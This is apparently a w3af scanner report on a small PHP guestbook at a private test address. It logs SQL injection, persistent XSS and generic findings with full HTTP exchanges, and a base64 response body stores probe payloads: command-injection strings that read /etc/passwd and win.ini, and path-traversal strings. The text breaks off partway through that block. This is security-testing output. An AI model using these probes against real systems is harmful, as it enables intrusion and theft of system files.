            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js"/>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="ajax"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scaninfo>
    <vulnerability id="[627]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://192.168.0.116:31337/post" var="pseudo">
        <description>SQL injection in a MySQL database was found at: &quot;http://192.168.0.116:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=Hello%20World&amp;pseudo=a%27b%22c%27d%22&quot; which modifies the &quot;pseudo&quot; parameter. This vulnerability was found in the request with id 627.</description>
        <http-transactions>
            <http-transaction id="627">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="45" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1hJTI3YiUyMmMlMjdkJTIy
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;', 'Hello World')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[629]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://192.168.0.116:31337/post" var="message">
        <description>SQL injection in a MySQL database was found at: &quot;http://192.168.0.116:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=a%27b%22c%27d%22&amp;pseudo=56&quot; which modifies the &quot;message&quot; parameter. This vulnerability was found in the request with id 629.</description>
        <http-transactions>
            <http-transaction id="629">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="34" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1hJTI3YiUyMmMlMjdkJTIyJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[232, 291, 317]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;. This vulnerability was found in the requests with ids 232, 291 and 317.</description>
        <http-transactions>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="317">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[232, 291, 365]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://192.168.0.116:31337/" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://192.168.0.116:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;. This vulnerability was found in the requests with ids 232, 291 and 365.</description>
        <http-transactions>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[798, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://192.168.0.116:31337/post" var="pseudo">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;gny4i&lt;/-&gt;&quot; to the &quot;pseudo&quot; parameter at http://192.168.0.116:31337/post, which is echoed when browsing to http://192.168.0.116:31337/. This vulnerability was found in the requests with ids 798 and 1175.</description>
        <http-transactions>
            <http-transaction id="798">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="44" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1nbnk0aSUzQyUyRi0lM0U=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
InJrZHhqIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjg1MTE4MjM1PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0
Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4v
ZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
QzoIb290LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5D
Oghvb3QuaW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVT
WVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkALmh0bWw8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NDExMTYxODU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YSkvKS8pLykvKS8pLykvKS8pLykvKS8p
LzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5hKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS88L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aFR0cDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5oVHRwOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmh0VHBz
Oi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0VHBzOi8vdzNhZi5vcmcvPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5m
VHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+dllVWm1oOFU8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
